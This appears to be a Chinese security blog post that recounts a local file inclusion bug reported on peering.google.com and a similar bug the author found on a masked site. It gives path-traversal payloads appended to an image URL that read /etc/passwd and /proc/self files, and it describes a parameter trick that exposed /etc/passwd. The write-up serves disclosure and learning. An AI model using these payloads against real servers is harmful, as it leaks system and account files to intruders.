你是怎么想到要在 png 图片后加 cat 的?

  • A+
所属分类:安全文章


你是怎么想到要在 png 图片后加 cat 的?

k同学这次是引用【peering.google.com中的本地文件包含】漏洞案例来分享,这是我在国外博客上看到的,正如标题所说"你tm是怎么想到在url图片后加cat的?"

1.攻击者获得有关服务器和内核数据的信息。  PoC:“/proc/version”或“/proc/cpuinfo”或“proc/meminfo”)2.攻击者获取有关服务器上文件的信息。  PoC:“/proc/self/cmdline”)3.攻击者获取有关内部网络的信息。  PoC:”/proc/self/cmdline“)4.攻击者获得有关操作及其在服务器上运行时间的信息。  PoC:”proc/self/stat“)5.攻击者获得有关操作过程和系统能力的敏感信息,这些信息可以很好地衡量拒绝服务攻击的规模。  PoC:“/proc/self/status”)
https://peering.google.com/static/images/couch-ipad.png在链接末尾添加以下值之一:cat ../../../../../../../etc/passwdcat ../../. ./../../../../proc/self/cmdlinecat ../../../../../../../proc/self/stat/ cat ../../../../../../../proc /self/status
通过这种方式:https://peering.google.com/static/images/couch-ipad.png cat ../../../../../../../proc/self/cmdline

附漏洞作者的视频:


 【分割线】

这让我想起了我几年前在t00ls发过的一个文件包含漏洞

你是怎么想到要在 png 图片后加 cat 的?

头像地址:http://www.******.com/*********8?owner=1&person=1556935&defaultimg=/jsp/person/p_images/person-jlzx.gif

看到defaultimg参数就直觉告诉我能进行文件读取,于是换成根目录index.jsp,发现没任何反应....

你是怎么想到要在 png 图片后加 cat 的?

于是把前面的person参数值前面加个负号.....果然内容出来了

你是怎么想到要在 png 图片后加 cat 的?

接着/etc/passwd


你是怎么想到要在 png 图片后加 cat 的?

over


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: